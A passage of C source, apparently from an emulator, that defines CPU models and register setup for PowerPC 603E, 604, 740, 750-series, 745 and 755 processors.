PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_603; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void init_proc_603E(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_603(env); /* Time base */ gen_tbl(env); /* hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_603(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(603E)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 603e"; pcc->init_proc = init_proc_603E; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_603E; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void init_proc_604(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_604(env); /* Time base */ gen_tbl(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); init_excp_604(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(604)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 604"; pcc->init_proc = init_proc_604; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_604; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_604E(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_604(env); /* XXX : not implemented */ spr_register(env, SPR_7XX_MMCR1, "MMCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC3, "PMC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC4, "PMC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Time base */ gen_tbl(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); init_excp_604(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(604E)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 604E"; pcc->init_proc = init_proc_604E; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_604; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_740(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); init_excp_7x0(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(740)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 740"; pcc->init_proc = init_proc_740; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_750(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); /* * XXX: high BATs are also present but are known to be bugged on * die version 1.x */ init_excp_7x0(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(750)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 750"; pcc->init_proc = init_proc_750; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_750cl(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Time base */ gen_tbl(env); /* Thermal management */ /* Those registers are fake on 750CL */ spr_register(env, SPR_THRM1, "THRM1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_THRM2, "THRM2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_THRM3, "THRM3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX: not implemented */ spr_register(env, SPR_750_TDCL, "TDCL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_750_TDCH, "TDCH", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* DMA */ /* XXX : not implemented */ spr_register(env, SPR_750_WPAR, "WPAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_750_DMAL, "DMAL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_750_DMAU, "DMAU", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750CL_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750CL_HID4, "HID4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Quantization registers */ /* XXX : not implemented */ spr_register(env, SPR_750_GQR0, "GQR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR1, "GQR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR2, "GQR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR3, "GQR3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR4, "GQR4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR5, "GQR5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR6, "GQR6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR7, "GQR7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); /* PowerPC 750cl has 8 DBATs and 8 IBATs */ gen_high_BATs(env); init_excp_750cl(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(750cl)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 750 CL"; pcc->init_proc = init_proc_750cl; pcc->check_pow = check_pow_hid0; /* * XXX: not implemented: * cache lock instructions: * dcbz_l * floating point paired instructions * psq_lux * psq_lx * psq_stux * psq_stx * ps_abs * ps_add * ps_cmpo0 * ps_cmpo1 * ps_cmpu0 * ps_cmpu1 * ps_div * ps_madd * ps_madds0 * ps_madds1 * ps_merge00 * ps_merge01 * ps_merge10 * ps_merge11 * ps_mr * ps_msub * ps_mul * ps_muls0 * ps_muls1 * ps_nabs * ps_neg * ps_nmadd * ps_nmsub * ps_res * ps_rsqrte * ps_sel * ps_sub * ps_sum0 * ps_sum1 */ pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_750cx(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* This register is not implemented but is present for compatibility */ spr_register(env, SPR_SDA, "SDA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); /* PowerPC 750cx has 8 DBATs and 8 IBATs */ gen_high_BATs(env); init_excp_750cx(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(750cx)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 750CX"; pcc->init_proc = init_proc_750cx; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_750fx(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* XXX : not implemented */ spr_register(env, SPR_750_THRM4, "THRM4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750FX_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); /* PowerPC 750fx & 750gx has 8 DBATs and 8 IBATs */ gen_high_BATs(env); init_excp_7x0(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(750fx)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 750FX"; pcc->init_proc = init_proc_750fx; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_750gx(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* XXX : not implemented (XXX: different from 750fx) */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* XXX : not implemented */ spr_register(env, SPR_750_THRM4, "THRM4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation registers */ /* XXX : not implemented (XXX: different from 750fx) */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented (XXX: different from 750fx) */ spr_register(env, SPR_750FX_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); /* PowerPC 750fx & 750gx has 8 DBATs and 8 IBATs */ gen_high_BATs(env); init_excp_7x0(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(750gx)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 750GX"; pcc->init_proc = init_proc_750gx; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_745(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); gen_spr_G2_755(env); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_7x5(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(745)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 745"; pcc->init_proc = init_proc_745; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_7x5; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_755(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); gen_spr_G2_755(env); /* Time base */ gen_tbl(env); /* L2 cache control */ /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_L2PMCR, "L2PMCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Thermal management */ gen_spr_thrm(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, 